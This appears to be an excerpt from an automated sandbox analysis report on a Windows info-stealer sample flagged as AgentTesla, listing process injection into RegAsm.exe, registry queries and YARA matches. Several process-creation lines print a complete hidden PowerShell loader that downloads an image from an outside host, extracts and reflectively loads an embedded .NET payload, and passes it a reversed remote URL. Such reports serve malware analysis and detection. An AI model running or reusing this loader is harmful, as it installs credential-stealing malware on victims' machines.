?RwBl? ? ? ? ?HQ? ? ? ? ?UwB0? ? ? ? ?HI? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?cgB0? ? ? ? ?EY? ? ? ? ?b? ? ? ? ?Bh? ? ? ? ?Gc? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?Jw? ? ? ? ?8? ? ? ? ?Dw? ? ? ? ?QgBB? ? ? ? ?FM? ? ? ? ?RQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?XwBT? ? ? ? ?FQ? ? ? ? ?QQBS? ? ? ? ?FQ? ? ? ? ?Pg? ? ? ? ?+? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GU? ? ? ? ?bgBk? ? ? ? ?EY? ? ? ? ?b? ? ? ? ?Bh? ? ? ? ?Gc? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?Jw? ? ? ? ?8? ? ? ? ?Dw? ? ? ? ?QgBB?

Injects a PE file into a foreign processes

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A

Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 440000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 442000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: D51008	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?MQ? ? ? ? ?w? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?G4? ? ? ? ?bwB0? ? ? ? ?GU? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?v? ? ? ? ?GQ? ? ? ? ?ZQBh? ? ? ? ?HQ? ? ? ? ?a? ? ? ? ?Bu? ? ? ? ?G8? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?C4? ? ? ? ?agBw? ? ? ? ?Gc? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?TgBl? ? ? ? ?Hc? ? ? ? ?LQBP? ? ? ? ?GI? ? ? ? ?agBl? ? ? ? ?GM? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?FM? ? ? ? ?eQBz? ? ? ? ?HQ? ? ? ? ?ZQBt? ? ? ? ?C4? ? ? ? ?TgBl? ? ? ? ?HQ? ? ? ? ?LgBX? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C4? ? ? ? ?R? ? ? ? ?Bv? ? ? ? ?Hc? ? ? ? ?bgBs? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?EQ? ? ? ? ?YQB0? ? ? ? ?GE? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBV? ? ? ? ?HI? ? ? ? ?b? ? ? ? ?? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?Bb? ? ? ? ?FM? ? ? ? ?eQBz? ? ? ? ?HQ? ? ? ? ?ZQBt? ? ? ? ?C4? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EU? ? ? ? ?bgBj? ? ? ? ?G8? ? ? ? ?Z? ? ? ? ?Bp? ? ? ? ?G4? ? ? ? ?ZwBd? ? ? ? ?Do? ? ? ? ?OgBV? ? ? ? ?FQ? ? ? ? ?Rg? ? ? ? ?4? ? ? ? ?C4? ? ? ? ?RwBl? ? ? ? ?HQ? ? ? ? ?UwB0? ? ? ? ?HI? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?cgB0? ? ? ? ?EY? ? ? ? ?b? ? ? ? ?Bh? ? ? ? ?Gc? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?Jw? ? ? ? ?8? ? ? ? ?Dw? ? ? ? ?QgBB? ? ? ? ?FM? ? ? ? ?RQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?XwBT? ? ? ? ?FQ? ? ? ? ?QQBS? ? ? ? ?FQ? ? ? ? ?Pg? ? ? ? ?+? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GU? ? ? ? ?bgBk? ? ? ? ?EY? ? ? ? ?b? ? ? ? ?Bh? ? ? ? ?Gc? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?Jw? ? ? ? ?8? ? ? ? ?Dw? ? ? ? ?QgBB?	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.NGRO/gol/moc.onapnape//:sptth' , '1' , 'C:\ProgramData\' , 'atrophiante','RegAsm','desativado'))"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C copy *.js "C:\ProgramData\atrophiante.js"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'j? ? ? ? ?bp? ? ? ? ?g0? ? ? ? ?yqbn? ? ? ? ?gu? ? ? ? ?vqby? ? ? ? ?gw? ? ? ? ?i? ? ? ? ?? ? ? ? ?9? ? ? ? ?c? ? ? ? ?? ? ? ? ?jwbo? ? ? ? ?hq? ? ? ? ?d? ? ? ? ?bw? ? ? ? ?hm? ? ? ? ?og? ? ? ? ?v? ? ? ? ?c8? ? ? ? ?aqbh? ? ? ? ?dy? ? ? ? ?m? ? ? ? ?? ? ? ? ?x? ? ? ? ?dy? ? ? ? ?m? ? ? ? ?? ? ? ? ?2? ? ? ? ?c4? ? ? ? ?dqbz? ? ? ? ?c4? ? ? ? ?yqby? ? ? ? ?gm? ? ? ? ?a? ? ? ? ?bp? ? ? ? ?hy? ? ? ? ?zq? ? ? ? ?u? ? ? ? ?g8? ? ? ? ?cgbn? ? ? ? ?c8? ? ? ? ?mq? ? ? ? ?w? ? ? ? ?c8? ? ? ? ?aqb0? ? ? ? ?gu? ? ? ? ?bqbz? ? ? ? ?c8? ? ? ? ?z? ? ? ? ?bl? ? ? ? ?ge? ? ? ? ?d? ? ? ? ?bo? ? ? ? ?g4? ? ? ? ?bwb0? ? ? ? ?gu? ? ? ? ?xw? ? ? ? ?y? ? ? ? ?d? ? ? ? ?? ? ? ? ?mg? ? ? ? ?0? ? ? ? ?d? ? ? ? ?? ? ? ? ?nw? ? ? ? ?v? ? ? ? ?gq? ? ? ? ?zqbh? ? ? ? ?hq? ? ? ? ?a? ? ? ? ?bu? ? ? ? ?g8? ? ? ? ?d? ? ? ? ?bl? ? ? ? ?c4? ? ? ? ?agbw? ? ? ? ?gc? ? ? ? ?jw? ? ? ? ?7? ? ? ? ?cq? ? ? ? ?dwbl? ? ? ? ?gi? ? ? ? ?qwbs? ? ? ? ?gk? ? ? ? ?zqbu? ? ? ? ?hq? ? ? ? ?i? ? ? ? ?? ? ? ? ?9? ? ? ? ?c? ? ? ? ?? ? ? ? ?tgbl? ? ? ? ?hc? ? ? ? ?lqbp? ? ? ? ?gi? ? ? ? ?agbl? ? ? ? ?gm? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?fm? ? ? ? ?eqbz? ? ? ? ?hq? ? ? ? ?zqbt? ? ? ? ?c4? ? ? ? ?tgbl? ? ? ? ?hq? ? ? ? ?lgbx? ? ? ? ?gu? ? ? ? ?ygbd? ? ? ? ?gw? ? ? ? ?aqbl? ? ? ? ?g4? ? ? ? ?d? ? ? ? ?? ? ? ? ?7? ? ? ? ?cq? ? ? ? ?aqbt? ? ? ? ?ge? ? ? ? ?zwbl? ? ? ? ?ei? ? ? ? ?eqb0? ? ? ? ?gu? ? ? ? ?cw? ? ? ? ?g? ? ? ? ?d0? ? ? ? ?i? ? ? ? ?? ? ? ? ?k? ? ? ? ?hc? ? ? ? ?zqbi? ? ? ? ?em? ? ? ? ?b? ? ? ? ?bp? ? ? ? ?gu? ? ? ? ?bgb0? ? ? ? ?c4? ? ? ? ?r? ? ? ? ?bv? ? ? ? ?hc? ? ? ? ?bgbs? ? ? ? ?g8? ? ? ? ?yqbk? ? ? ? ?eq? ? ? ? ?yqb0? ? ? ? ?ge? ? ? ? ?k? ? ? ? ?? ? ? ? ?k? ? ? ? ?gk? ? ? ? ?bqbh? ? ? ? ?gc? ? ? ? ?zqbv? ? ? ? ?hi? ? ? ? ?b? ? ? ? ?? ? ? ? ?p? ? ? ? ?ds? ? ? ? ?j? ? ? ? ?bp? ? ? ? ?g0? ? ? ? ?yqbn? ? ? ? ?gu? ? ? ? ?v? ? ? ? ?bl? ? ? ? ?hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?d0? ? ? ? ?i? ? ? ? ?bb? ? ? ? ?fm? ? ? ? ?eqbz? ? ? ? ?hq? ? ? ? ?zqbt? ? ? ? ?c4? ? ? ? ?v? ? ? ? ?bl? ? ? ? ?hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?eu? ? ? ? ?bgbj? ? ? ? ?g8? ? ? ? ?z? ? ? ? ?bp? ? ? ? ?g4? ? ? ? ?zwbd? ? ? ? ?do? ? ? ? ?ogbv? ? ? ? ?fq? ? ? ? ?rg? ? ? ? ?4? ? ? ? ?c4? ? ? ? ?rwbl? ? ? ? ?hq? ? ? ? ?uwb0? ? ? ? ?hi? ? ? ? ?aqbu? ? ? ? ?gc? ? ? ? ?k? ? ? ? ?? ? ? ? ?k? ? ? ? ?gk? ? ? ? ?bqbh? ? ? ? ?gc? ? ? ? ?zqbc? ? ? ? ?hk? ? ? ? ?d? ? ? ? ?bl? ? ? ? ?hm? ? ? ? ?kq? ? ? ? ?7? ? ? ? ?cq? ? ? ? ?cwb0? ? ? ? ?ge? ? ? ? ?cgb0? ? ? ? ?ey? ? ? ? ?b? ? ? ? ?bh? ? ? ? ?gc? ? ? ? ?i? ? ? ? ?? ? ? ? ?9? ? ? ? ?c? ? ? ? ?? ? ? ? ?jw? ? ? ? ?8? ? ? ? ?dw? ? ? ? ?qgbb? ? ? ? ?fm? ? ? ? ?rq? ? ? ? ?2? ? ? ? ?dq? ? ? ? ?xwbt? ? ? ? ?fq? ? ? ? ?qqbs? ? ? ? ?fq? ? ? ? ?pg? ? ? ? ?+? ? ? ? ?cc? ? ? ? ?ow? ? ? ? ?k? ? ? ? ?gu? ? ? ? ?bgbk? ? ? ? ?ey? ? ? ? ?b? ? ? ? ?bh? ? ? ? ?gc? ? ? ? ?i? ? ? ? ?? ? ? ? ?9? ? ? ? ?c? ? ? ? ?? ? ? ? ?jw? ? ? ? ?8? ? ? ? ?dw? ? ? ? ?qgbb?
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "$imageurl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webclient = new-object system.net.webclient;$imagebytes = $webclient.downloaddata($imageurl);$imagetext = [system.text.encoding]::utf8.getstring($imagebytes);$startflag = '<<base64_start>>';$endflag = '<<base64_end>>';$startindex = $imagetext.indexof($startflag);$endindex = $imagetext.indexof($endflag);$startindex -ge 0 -and $endindex -gt $startindex;$startindex += $startflag.length;$base64length = $endindex - $startindex;$base64command = $imagetext.substring($startindex, $base64length);$commandbytes = [system.convert]::frombase64string($base64command);$loadedassembly = [system.reflection.assembly]::load($commandbytes);$type = $loadedassembly.gettype('dnlib.io.home');$method = $type.getmethod('vai').invoke($null, [object[]] ('txt.ngro/gol/moc.onapnape//:sptth' , '1' , 'c:\programdata\' , 'atrophiante','regasm','desativado'))"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'j? ? ? ? ?bp? ? ? ? ?g0? ? ? ? ?yqbn? ? ? ? ?gu? ? ? ? ?vqby? ? ? ? ?gw? ? ? ? ?i? ? ? ? ?? ? ? ? ?9? ? ? ? ?c? ? ? ? ?? ? ? ? ?jwbo? ? ? ? ?hq? ? ? ? ?d? ? ? ? ?bw? ? ? ? ?hm? ? ? ? ?og? ? ? ? ?v? ? ? ? ?c8? ? ? ? ?aqbh? ? ? ? ?dy? ? ? ? ?m? ? ? ? ?? ? ? ? ?x? ? ? ? ?dy? ? ? ? ?m? ? ? ? ?? ? ? ? ?2? ? ? ? ?c4? ? ? ? ?dqbz? ? ? ? ?c4? ? ? ? ?yqby? ? ? ? ?gm? ? ? ? ?a? ? ? ? ?bp? ? ? ? ?hy? ? ? ? ?zq? ? ? ? ?u? ? ? ? ?g8? ? ? ? ?cgbn? ? ? ? ?c8? ? ? ? ?mq? ? ? ? ?w? ? ? ? ?c8? ? ? ? ?aqb0? ? ? ? ?gu? ? ? ? ?bqbz? ? ? ? ?c8? ? ? ? ?z? ? ? ? ?bl? ? ? ? ?ge? ? ? ? ?d? ? ? ? ?bo? ? ? ? ?g4? ? ? ? ?bwb0? ? ? ? ?gu? ? ? ? ?xw? ? ? ? ?y? ? ? ? ?d? ? ? ? ?? ? ? ? ?mg? ? ? ? ?0? ? ? ? ?d? ? ? ? ?? ? ? ? ?nw? ? ? ? ?v? ? ? ? ?gq? ? ? ? ?zqbh? ? ? ? ?hq? ? ? ? ?a? ? ? ? ?bu? ? ? ? ?g8? ? ? ? ?d? ? ? ? ?bl? ? ? ? ?c4? ? ? ? ?agbw? ? ? ? ?gc? ? ? ? ?jw? ? ? ? ?7? ? ? ? ?cq? ? ? ? ?dwbl? ? ? ? ?gi? ? ? ? ?qwbs? ? ? ? ?gk? ? ? ? ?zqbu? ? ? ? ?hq? ? ? ? ?i? ? ? ? ?? ? ? ? ?9? ? ? ? ?c? ? ? ? ?? ? ? ? ?tgbl? ? ? ? ?hc? ? ? ? ?lqbp? ? ? ? ?gi? ? ? ? ?agbl? ? ? ? ?gm? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?fm? ? ? ? ?eqbz? ? ? ? ?hq? ? ? ? ?zqbt? ? ? ? ?c4? ? ? ? ?tgbl? ? ? ? ?hq? ? ? ? ?lgbx? ? ? ? ?gu? ? ? ? ?ygbd? ? ? ? ?gw? ? ? ? ?aqbl? ? ? ? ?g4? ? ? ? ?d? ? ? ? ?? ? ? ? ?7? ? ? ? ?cq? ? ? ? ?aqbt? ? ? ? ?ge? ? ? ? ?zwbl? ? ? ? ?ei? ? ? ? ?eqb0? ? ? ? ?gu? ? ? ? ?cw? ? ? ? ?g? ? ? ? ?d0? ? ? ? ?i? ? ? ? ?? ? ? ? ?k? ? ? ? ?hc? ? ? ? ?zqbi? ? ? ? ?em? ? ? ? ?b? ? ? ? ?bp? ? ? ? ?gu? ? ? ? ?bgb0? ? ? ? ?c4? ? ? ? ?r? ? ? ? ?bv? ? ? ? ?hc? ? ? ? ?bgbs? ? ? ? ?g8? ? ? ? ?yqbk? ? ? ? ?eq? ? ? ? ?yqb0? ? ? ? ?ge? ? ? ? ?k? ? ? ? ?? ? ? ? ?k? ? ? ? ?gk? ? ? ? ?bqbh? ? ? ? ?gc? ? ? ? ?zqbv? ? ? ? ?hi? ? ? ? ?b? ? ? ? ?? ? ? ? ?p? ? ? ? ?ds? ? ? ? ?j? ? ? ? ?bp? ? ? ? ?g0? ? ? ? ?yqbn? ? ? ? ?gu? ? ? ? ?v? ? ? ? ?bl? ? ? ? ?hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?d0? ? ? ? ?i? ? ? ? ?bb? ? ? ? ?fm? ? ? ? ?eqbz? ? ? ? ?hq? ? ? ? ?zqbt? ? ? ? ?c4? ? ? ? ?v? ? ? ? ?bl? ? ? ? ?hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?eu? ? ? ? ?bgbj? ? ? ? ?g8? ? ? ? ?z? ? ? ? ?bp? ? ? ? ?g4? ? ? ? ?zwbd? ? ? ? ?do? ? ? ? ?ogbv? ? ? ? ?fq? ? ? ? ?rg? ? ? ? ?4? ? ? ? ?c4? ? ? ? ?rwbl? ? ? ? ?hq? ? ? ? ?uwb0? ? ? ? ?hi? ? ? ? ?aqbu? ? ? ? ?gc? ? ? ? ?k? ? ? ? ?? ? ? ? ?k? ? ? ? ?gk? ? ? ? ?bqbh? ? ? ? ?gc? ? ? ? ?zqbc? ? ? ? ?hk? ? ? ? ?d? ? ? ? ?bl? ? ? ? ?hm? ? ? ? ?kq? ? ? ? ?7? ? ? ? ?cq? ? ? ? ?cwb0? ? ? ? ?ge? ? ? ? ?cgb0? ? ? ? ?ey? ? ? ? ?b? ? ? ? ?bh? ? ? ? ?gc? ? ? ? ?i? ? ? ? ?? ? ? ? ?9? ? ? ? ?c? ? ? ? ?? ? ? ? ?jw? ? ? ? ?8? ? ? ? ?dw? ? ? ? ?qgbb? ? ? ? ?fm? ? ? ? ?rq? ? ? ? ?2? ? ? ? ?dq? ? ? ? ?xwbt? ? ? ? ?fq? ? ? ? ?qqbs? ? ? ? ?fq? ? ? ? ?pg? ? ? ? ?+? ? ? ? ?cc? ? ? ? ?ow? ? ? ? ?k? ? ? ? ?gu? ? ? ? ?bgbk? ? ? ? ?ey? ? ? ? ?b? ? ? ? ?bh? ? ? ? ?gc? ? ? ? ?i? ? ? ? ?? ? ? ? ?9? ? ? ? ?c? ? ? ? ?? ? ? ? ?jw? ? ? ? ?8? ? ? ? ?dw? ? ? ? ?qgbb?	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "$imageurl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webclient = new-object system.net.webclient;$imagebytes = $webclient.downloaddata($imageurl);$imagetext = [system.text.encoding]::utf8.getstring($imagebytes);$startflag = '<<base64_start>>';$endflag = '<<base64_end>>';$startindex = $imagetext.indexof($startflag);$endindex = $imagetext.indexof($endflag);$startindex -ge 0 -and $endindex -gt $startindex;$startindex += $startflag.length;$base64length = $endindex - $startindex;$base64command = $imagetext.substring($startindex, $base64length);$commandbytes = [system.convert]::frombase64string($base64command);$loadedassembly = [system.reflection.assembly]::load($commandbytes);$type = $loadedassembly.gettype('dnlib.io.home');$method = $type.getmethod('vai').invoke($null, [object[]] ('txt.ngro/gol/moc.onapnape//:sptth' , '1' , 'c:\programdata\' , 'atrophiante','regasm','desativado'))"	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: 7.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.powershell.exe.1a8e949b578.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.powershell.exe.1a8e949b578.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.2699963900.0000000002C4E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
